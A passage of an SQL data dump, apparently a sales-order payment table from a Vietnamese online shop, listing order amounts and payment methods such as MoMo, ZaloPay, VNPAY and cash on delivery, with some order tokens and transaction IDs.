ULL,101100.0000,101100.0000,NULL,NULL,NULL,101100.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(172,172,NULL,NULL,NULL,NULL,NULL,101100.0000,NULL,NULL,0.0000,0.0000,NULL,101100.0000,101100.0000,NULL,NULL,NULL,101100.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(173,173,NULL,NULL,NULL,NULL,NULL,17692510.0000,NULL,NULL,10.0000,10.0000,NULL,17692510.0000,17692510.0000,NULL,NULL,NULL,17692510.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(174,174,NULL,NULL,NULL,NULL,NULL,450000.0000,NULL,NULL,0.0000,0.0000,NULL,450000.0000,450000.0000,NULL,NULL,NULL,450000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(175,175,NULL,NULL,NULL,NULL,NULL,1600000.0000,NULL,NULL,0.0000,0.0000,NULL,1600000.0000,1600000.0000,NULL,NULL,NULL,1600000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(176,176,NULL,NULL,NULL,NULL,NULL,2940000.0000,NULL,NULL,0.0000,0.0000,NULL,2940000.0000,2940000.0000,NULL,NULL,NULL,2940000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(177,177,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7390410.0000,NULL,NULL,NULL,7390410.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(178,178,NULL,NULL,NULL,NULL,NULL,1304190.0000,NULL,NULL,0.0000,0.0000,NULL,1304190.0000,1304190.0000,NULL,NULL,NULL,1304190.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(179,179,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,3144210.0000,NULL,NULL,NULL,3144210.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(180,180,NULL,NULL,NULL,NULL,NULL,9220320.0000,NULL,NULL,0.0000,0.0000,NULL,9220320.0000,9220320.0000,NULL,NULL,NULL,9220320.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(181,181,0.0000,0.0000,NULL,202200.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,202200.0000,NULL,202200.0000,NULL,NULL,NULL,202200.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(182,182,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1364000.0000,NULL,NULL,NULL,1364000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master, Th\\u1ebb T\\u00edn D\\u1ee5ng, VNPAY, VNPAY QR...)\"}'),(183,183,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,819500.0000,NULL,NULL,NULL,819500.0000,NULL,NULL,NULL,NULL,NULL,NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Thanh to\\u00e1n khi nh\\u1eadn h\\u00e0ng\",\"instructions\":null}'),(184,184,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1292500.0000,NULL,NULL,NULL,1292500.0000,NULL,NULL,NULL,NULL,NULL,NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Thanh to\\u00e1n khi nh\\u1eadn h\\u00e0ng\",\"instructions\":null}'),(185,185,NULL,NULL,NULL,NULL,NULL,47873200.0000,NULL,NULL,0.0000,0.0000,NULL,47873200.0000,47873200.0000,NULL,NULL,NULL,47873200.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(186,186,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(187,187,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(188,188,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(189,189,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(190,190,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(191,191,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(192,192,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(193,193,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(194,194,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(195,195,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(196,196,NULL,NULL,NULL,NULL,NULL,1364000.0000,NULL,NULL,0.0000,0.0000,NULL,1364000.0000,1364000.0000,NULL,NULL,NULL,1364000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(197,197,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(198,198,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(199,199,NULL,NULL,NULL,NULL,NULL,1540000.0000,NULL,NULL,0.0000,0.0000,NULL,1540000.0000,1540000.0000,NULL,NULL,NULL,1540000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(200,200,NULL,NULL,NULL,NULL,NULL,1292500.0000,NULL,NULL,0.0000,0.0000,NULL,1292500.0000,1292500.0000,NULL,NULL,NULL,1292500.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(201,201,NULL,NULL,NULL,NULL,NULL,1540000.0000,NULL,NULL,0.0000,0.0000,NULL,1540000.0000,1540000.0000,NULL,NULL,NULL,1540000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(202,202,NULL,NULL,NULL,NULL,NULL,1749000.0000,NULL,NULL,0.0000,0.0000,NULL,1749000.0000,1749000.0000,NULL,NULL,NULL,1749000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(203,203,NULL,NULL,NULL,NULL,NULL,2200000.0000,NULL,NULL,0.0000,0.0000,NULL,2200000.0000,2200000.0000,NULL,NULL,NULL,2200000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(204,204,NULL,NULL,NULL,NULL,NULL,1364000.0000,NULL,NULL,0.0000,0.0000,NULL,1364000.0000,1364000.0000,NULL,NULL,NULL,1364000.0000,NULL,NULL,NULL,NULL,'0',NULL,'zalopay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\"}'),(205,205,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1760000.0000,NULL,NULL,NULL,1760000.0000,NULL,NULL,NULL,NULL,'0',NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"35b07d293f6ea5367ef9ac532fb2db05\"}'),(206,206,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"acbeebd07430e8defbd65cb6789a699e\"}'),(207,207,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"f89931d5a4cfb49b4a13c82fadf7f850\"}'),(208,208,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,200000.0000,NULL,NULL,NULL,200000.0000,NULL,NULL,NULL,NULL,'0',NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"da0c350606b8f41c15e4ab5602e47447\"}'),(209,209,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,200000.0000,NULL,NULL,NULL,200000.0000,NULL,NULL,NULL,NULL,'0',NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"3ae084cfdec9a32a4389fd722fd62985\"}'),(210,210,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"ef7c9d7bace14a1dfc699a0482698824\"}'),(211,211,NULL,NULL,NULL,NULL,NULL,100000.0000,NULL,NULL,0.0000,0.0000,NULL,100000.0000,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"MoMo\"}'),(212,212,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,100000.0000,NULL,NULL,NULL,100000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"33521a78ac9d991463c16e9aa4f253e0\"}'),(213,213,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1292500.0000,NULL,NULL,NULL,1292500.0000,NULL,NULL,NULL,NULL,'0',NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"5f1cd1d9c9063b40f0e8b4b12a6e50a3\"}'),(214,214,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1320000.0000,NULL,NULL,NULL,1320000.0000,NULL,NULL,NULL,NULL,'0',NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"ff907b07f966d834022d955b4637cfba\"}'),(215,215,NULL,NULL,NULL,NULL,NULL,2000.0000,NULL,NULL,0.0000,0.0000,NULL,2000.0000,2000.0000,NULL,NULL,NULL,2000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\"}'),(216,216,NULL,NULL,NULL,NULL,NULL,2000.0000,NULL,NULL,0.0000,0.0000,NULL,2000.0000,2000.0000,NULL,NULL,NULL,2000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\"}'),(217,217,NULL,NULL,NULL,NULL,NULL,2000.0000,NULL,NULL,0.0000,0.0000,NULL,2000.0000,2000.0000,NULL,NULL,NULL,2000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\"}'),(218,218,NULL,NULL,NULL,NULL,NULL,2000.0000,NULL,NULL,0.0000,0.0000,NULL,2000.0000,2000.0000,NULL,NULL,NULL,2000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\"}'),(219,219,NULL,NULL,NULL,NULL,NULL,2000.0000,NULL,NULL,0.0000,0.0000,NULL,2000.0000,2000.0000,NULL,NULL,NULL,2000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\"}'),(220,220,NULL,NULL,NULL,NULL,NULL,2000.0000,NULL,NULL,0.0000,0.0000,NULL,2000.0000,2000.0000,NULL,NULL,NULL,2000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\"}'),(221,221,0.0000,0.0000,NULL,2000.0000,NULL,2000.0000,2000.0000,NULL,0.0000,0.0000,2000.0000,2000.0000,2000.0000,NULL,NULL,NULL,2000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,'18960618629',NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\",\"transaction_id\":\"18960618629\"}'),(222,222,0.0000,0.0000,NULL,2000.0000,NULL,2000.0000,2000.0000,NULL,0.0000,0.0000,2000.0000,2000.0000,2000.0000,NULL,NULL,NULL,2000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,'18960128242',NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\",\"transaction_id\":\"18960128242\"}'),(223,223,0.0000,0.0000,NULL,4000.0000,NULL,4000.0000,4000.0000,NULL,0.0000,0.0000,4000.0000,4000.0000,4000.0000,NULL,NULL,NULL,4000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,'18960703159',NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\",\"transaction_id\":\"18960703159\"}'),(224,224,NULL,NULL,NULL,NULL,NULL,1320000.0000,NULL,NULL,0.0000,0.0000,NULL,1320000.0000,1320000.0000,NULL,NULL,NULL,1320000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"V\\u00ed MoMo\"}'),(225,225,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1749000.0000,NULL,NULL,NULL,1749000.0000,NULL,NULL,NULL,NULL,'0',NULL,'lof_zalopayment',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"ZaloPay\",\"zalopayment_order_token\":\"c8ba58bae920a0c35302b22bddc00ffa\"}'),(226,226,0.0000,0.0000,NULL,996000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,996000.0000,NULL,996000.0000,NULL,NULL,NULL,996000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'cashondelivery',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Thanh to\\u00e1n khi nh\\u1eadn h\\u00e0ng\",\"instructions\":null}'),(227,227,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,2000.0000,NULL,NULL,NULL,2000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master, Th\\u1ebb T\\u00edn D\\u1ee5ng, VNPAY, VNPAY QR...)\"}'),(228,228,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,14289000.0000,NULL,NULL,NULL,14289000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master, Th\\u1ebb T\\u00edn D\\u1ee5ng, VNPAY, VNPAY QR...)\"}'),(229,229,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9350000.0000,NULL,NULL,NULL,9350000.0000,NULL,NULL,NULL,NULL,'0',NULL,'banktransfer',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Chuy\\u1ec3n 